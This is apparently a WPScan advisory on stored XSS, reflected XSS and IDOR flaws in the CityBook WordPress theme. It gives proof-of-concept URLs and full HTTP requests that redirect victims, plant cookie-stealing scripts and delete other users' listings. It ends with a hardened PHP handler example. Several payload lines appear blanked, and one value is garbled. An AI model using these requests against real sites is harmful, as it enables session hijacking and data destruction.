WPVDB-ID: 797C5EB8-B849-47EF-B228-93AACF4A7EC9

CityBook < 2.3.4 - Multiple Vulnerabilities

Published: 2020-01-09 00:00:00
Author: m0ze
Source: wpscan.com

EPSS: 0.009
Percentile: 83.1%

Multiple vulnerabilities were discovered in the ‘CityBook - Directory & Listing WordPress Theme’ (tested version: v2.3.3):

- Unauthenticated Reflected XSS
- Authenticated Persistent XSS
- IDOR

Timeline (edit by WPScanTeam):

- December 27th, 2019 - Envato contacted
- January 6th, 2020 - Envato investigating
- January 7th, 2020 - v2.3.4 released

PoC

----[]- Info: -[]----

Google Dork: /wp-content/themes/citybook/
Date: 27/12/2019
Demo website: https://citybook2.cththemes.com/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://citybook2.cththemes.com/dashboard/?dashboard=listings

----[]- Reflected XSS: -[]----

The input field with the placeholder «What are you looking for?» on the homepage is vulnerable. Any payload is triggered three times if you put "> in front of it. The same applies to the regular search (the block near the website logo).

Payload Sample #0: ">
Payload Sample #1:
Payload Sample #2:

PoC #0: https://citybook2.cththemes.com/?search_term="><img+src%3Dx+onerror%3Dalert(document.cookie)>&location_search&nearby=off&address_lat&address_lng&distance=10&lcats[]=
PoC #1: https://citybook2.cththemes.com/?search_term=<img+src%3Dx+onerror%3Dalert(document.domain)>&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats[]=
PoC #2: https://citybook2.cththemes.com/?search_term="><img+src%3Dx+onerror%3Dwindow.location%3D`https%3A%2F%2Fm0ze.ru`%3B>&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats[]=

----[]- Persistent XSS -> Chat: -[]----

Any cookie-stealing payload can be used to hijack a user/administrator session or to force a redirect to a malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from the chat widget in the bottom right corner).
Payload Sample #0:
Payload Sample #1:

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7C405cfe7009dfb008514e88229282ad33155a10e3d6d1c666e2cee90970212542; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7Cbc01a1bfc8e119a186128f522382374eae5a7d80a044290cfd77280880c51de0

action=citybook_addons_chat_reply&_nonce=a75ac6298d&cid=1230&user_id=785&touid=1&reply_text=%3Cimg%20src%3Dx%20onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E

Where:
- user_id=XXX (your ID; in this example the account «m0ze» has ID 785);
- touid=1 (message receiver ID; in this example ID 1 == account «admin»);
- reply_text=payload (your payload text).

----[]- Persistent Self-XSS -> Profile: -[]----

Vulnerable input fields: «Phone» and «Address» (triggered only on the https://citybook2.cththemes.com/dashboard/?dashboard=profile page for the current user).

Payload Sample #0: ">
Payload Sample #1: "> Greetings from m0ze
Payload Sample #2: ">

----[]- Persistent XSS -> Listing page: -[]----

Add a new listing here: https://citybook2.cththemes.com/submit/ (the first time you need to order a «Free» plan and then open this URL again).

Vulnerable input fields: «Listing Address», «Listing Latitude», «Listing Longitude», «Email Address», «Description».
«Trainers» section: the «Add Member» option with the vulnerable input fields «Name», «Job or Position» and «Description».
«Additional Services Fees» section: the «Add Service» option with the vulnerable input field «Service Name».

The «Listing Address» payload also fires on the admin dashboard, so it is possible to steal administrator cookies.

Payload Sample #0: ">
Payload Sample #1: ">

Greetings from m0ze
Payload Sample #2: ">

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 5848
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=7610
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C62973039250bcf64067f2d87460bc142bfc1a6623ea7c5a57cc973245fff0a97; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C1790d7d33689fe6e21ffc2bcd001af3aa10e523b5a701b6f02944a4dd965f170; wp-settings-788=editor%3Dhtml; wp-settings-time-788=1577428516

-----------------------------18467633426500
Content-Disposition: form-data; name="lid"

7610
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_type_id"

4901
-----------------------------18467633426500
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------18467633426500
Content-Disposition: form-data; name="hasError"

false
-----------------------------18467633426500
Content-Disposition: form-data; name="title"

PoC
-----------------------------18467633426500
Content-Disposition: form-data; name="content"

Greetings from m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="thumbnail[0]"


-----------------------------18467633426500
Content-Disposition: form-data; name="cats[0]"

50
-----------------------------18467633426500
Content-Disposition: form-data; name="tags"


-----------------------------18467633426500
Content-Disposition: form-data; name="locations"

US|
-----------------------------18467633426500
Content-Disposition: form-data; name="features[0]"

64
-----------------------------18467633426500
Content-Disposition: form-data; name="features[1]"

84
-----------------------------18467633426500
Content-Disposition: form-data; name="features[2]"

66
-----------------------------18467633426500
Content-Disposition: form-data; name="features[3]"

76
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="ltags_names"

m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="post_excerpt"

">
Greetings from m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_address"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_latitude"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_longitude"


-----------------------------18467633426500
Content-Disposition: form-data; name="gmap"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_email"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_phone"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_website"


-----------------------------18467633426500
Content-Disposition: form-data; name="price_range"

moderate
-----------------------------18467633426500
Content-Disposition: form-data; name="price_from"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="price_to"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates"


-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates_show_metas"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_id]"

--imgsrc—imgsrcxonerroralertm0ze88-
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_name]"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_desc]"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_price]"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][name]"


-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][job]"


-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][desc]"


-----------------------------18467633426500
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------18467633426500
Content-Disposition: form-data; name="_wpnonce"

82b818f99a
-----------------------------18467633426500--

----[]- IDOR #0: -[]----

Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779
Pragma: no-cache
Cache-Control: no-cache

lid=1770&action=citybook_addons_delete_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee

Where: lid=XXXX (the unique WordPress ID of the page/post/listing; it can be discovered as a page class for tag).
----[]- IDOR #1: -[]----

Remove the «Featured» option for any listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779

lid=1739&lfeatured=true&action=citybook_addons_featured_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee

Where: lid=XXXX (the unique WordPress ID of the page/post/listing; it can be discovered as a page class for tag).
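The two admin-ajax endpoints behind the chat PoC and the IDOR PoCs above, rewritten with the checks they lack, as an added example that is not CityBook's or the advisory author's code. It assumes a 'listing' post type registered with map_meta_cap, a nonce action named 'example_nonce', and the theme's own message storage in place of the elided line.

```php
<?php
// Added example, not CityBook's code: hardened versions of two admin-ajax
// handlers from the PoCs above. Action and field names come from the page;
// the 'listing' post type and nonce action 'example_nonce' are assumptions.

function example_require_nonce_and_login() {
    // A nonce defeats CSRF only: the attacker's own nonce is valid for any
    // lid/touid, so this proves nothing about rights on the target object.
    check_ajax_referer( 'example_nonce', '_nonce' );
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( array( 'message' => 'login required' ), 401 );
    }
}

// Chat reply: stored XSS via reply_text, plus a caller-chosen user_id.
function example_chat_reply() {
    example_require_nonce_and_login();
    $sender   = get_current_user_id();   // never $_POST['user_id']
    $receiver = isset( $_POST['touid'] ) ? absint( $_POST['touid'] ) : 0;
    $text     = isset( $_POST['reply_text'] )
        ? sanitize_text_field( wp_unslash( $_POST['reply_text'] ) ) : '';
    if ( ! $receiver || ! get_userdata( $receiver ) || '' === $text ) {
        wp_send_json_error( array( 'message' => 'bad request' ), 400 );
    }
    // ... store ( $sender, $receiver, $text ) with the theme's own storage ...
    // Escape again on output: messages saved before the fix may already
    // carry <img onerror=...> markup that sanitize_text_field never saw.
    wp_send_json_success( array( 'to' => $receiver, 'text' => esc_html( $text ) ) );
}
add_action( 'wp_ajax_citybook_addons_chat_reply', 'example_chat_reply' );

// Delete listing: IDOR, because the original trusts lid with no ownership
// check. The same check (with 'edit_post') belongs in the featured handler.
function example_delete_listing() {
    example_require_nonce_and_login();
    $lid  = isset( $_POST['lid'] ) ? absint( $_POST['lid'] ) : 0;
    $post = $lid ? get_post( $lid ) : null;
    if ( ! $post || 'listing' !== $post->post_type ) {
        wp_send_json_error( array( 'message' => 'not a listing' ), 404 );
    }
    // With map_meta_cap on the post type, delete_post on another author's
    // post resolves to delete_others_posts: members may only remove their
    // own listings while administrators keep moderation rights.
    if ( ! current_user_can( 'delete_post', $post->ID ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    wp_trash_post( $post->ID );
    wp_send_json_success( array( 'lid' => $post->ID ) );
}
add_action( 'wp_ajax_citybook_addons_delete_listing', 'example_delete_listing' );
```

The nonce check alone would not have stopped either IDOR, since the requests on this page carry the attacker's own valid nonce; the object-level current_user_can() call is the part that was missing.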
